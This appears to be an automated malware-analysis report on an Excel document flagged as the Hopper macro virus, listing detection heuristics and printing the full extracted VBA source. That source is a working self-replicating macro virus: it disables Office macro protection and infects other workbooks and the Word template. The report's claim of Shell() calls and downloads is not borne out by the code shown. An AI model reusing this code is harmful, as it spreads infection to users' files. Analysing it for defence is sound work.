Malware Insights
The sample is a malicious Excel document containing VBA macros. The macros utilize `WScript.Shell` and `CreateObject` to write registry keys, indicating an attempt to establish persistence. The `Workbook_Deactivate` subroutine explicitly writes to `HKEY_CURRENT_USER\Software\Microsoft\Office\8.0\Excel\Microsoft Excel\Options6` and `HKEY_LOCAL_MACHINE\Software\Microsoft\Office\8.0\New User Settings\Excel\Microsoft Excel\Options6`. The presence of `Shell()` calls and `WScript.Shell` usage strongly suggests the execution of arbitrary commands or the download of further malicious content.
Heuristics (6)

- ClamAV: Doc.Trojan.Hopper-9 (critical, `CLAMAV_DETECTION`): ClamAV detected this file as malware: Doc.Trojan.Hopper-9
- VBA macros detected (medium, `OLE_VBA_MACROS`, 3 related findings): Document contains VBA macro code
- WScript.Shell usage (critical, `OLE_VBA_WSCRIPT`): WScript.Shell usage. Matched lines in script:

  ```vba
  On Error Resume Next
  Set WSHshell = CreateObject("WScript.Shell")
  WSHshell.Regwrite "HKEY_CURRENT_USER\Software\Microsoft\Office\8.0\Excel\Microsoft Excel\Options6", 0, "REG_DWORD"
  ```

- CreateObject call (high, `OLE_VBA_CREATEOBJ`): CreateObject call. Matched lines in script:

  ```vba
  On Error Resume Next
  Set WSHshell = CreateObject("WScript.Shell")
  WSHshell.Regwrite "HKEY_CURRENT_USER\Software\Microsoft\Office\8.0\Excel\Microsoft Excel\Options6", 0, "REG_DWORD"
  ```

- VBA p-code auto-exec with execution tokens (high, `OLE_VBA_PCODE_AUTOEXEC_EXEC`): Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
- Reference to Windows Script Host (high, `SC_STR_WSCRIPT`): Reference to Windows Script Host
Extracted artifacts (1)
Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 2957 bytes |

SHA-256: 4c9ef587beae8bc9fc576298e3d9886d265d47a336ee948747ef198027b1ebed

Detection (ClamAV): Doc.Trojan.Hopper-9
Obfuscation or payload: unlikely
Preview script: first 1,000 lines of the extracted script

```vba
Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
'<!--1nternal-->
Private Sub Document_Close()
On Error Resume Next
Set NT = NormalTemplate.VBProject.VBComponents(1).CodeModule
Set AD = ActiveDocument.VBProject.VBComponents(1).CodeModule
Options.VirusProtection = False
Options.SaveNormalPrompt = False
Options.ConfirmConversions = False
If NT.Lines(1, 1) <> "'<!--1nternal-->" Then
For i = 1 To 19
NT.InsertLines i, AD.Lines(i, 1)
Next
End If
If AD.Lines(1, 1) <> "'<!--1nternal-->" Then
For i = 1 To 19
AD.InsertLines i, NT.Lines(i, 1)
Next
End If
End Sub
'Ex-cell v0.1 /1nternal
Private Sub Workbook_Deactivate()
On Error Resume Next
Set WSHshell = CreateObject("WScript.Shell")
WSHshell.Regwrite "HKEY_CURRENT_USER\Software\Microsoft\Office\8.0\Excel\Microsoft Excel\Options6", 0, "REG_DWORD"
WSHshell.Regwrite "HKEY_LOCAL_MACHINE\Software\Microsoft\Office\8.0\New User Settings\Excel\Microsoft Excel\Options6", 0, "REG_DWORD"
For i = 1 To Workbooks.Count
If Workbooks(i).VBProject.VBComponents.Item("ThisWorkbook").CodeModule.Lines(1, 1) <> "'<!--1nternal-->" Then
For y = 1 To 45
Workbooks(i).VBProject.VBComponents.Item("ThisWorkbook").CodeModule.InsertLines y, ThisWorkbook.VBProject.VBComponents.Item("ThisWorkbook").CodeModule.Lines(y, 1)
Next
End If
Next
Set WordObj = CreateObject("Word.Application")
Set NT = WordObj.Templates(1).VBProject.VBComponents(1).CodeModule
If NT.Lines(1, 1) <> "'<!--1nternal-->" Then
WordObj.Options.SaveNormalPrompt = False
NT.DeleteLines 1, NT.CountOfLines
For i = 1 To 19
NT.InsertLines i, ThisWorkbook.VBProject.VBComponents.Item("ThisWorkbook").CodeModule.Lines(i, 1)
Next
End If
Set NT = Nothing
WordObj.Quit
End Sub
Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "Sheet2"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "Sheet3"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
```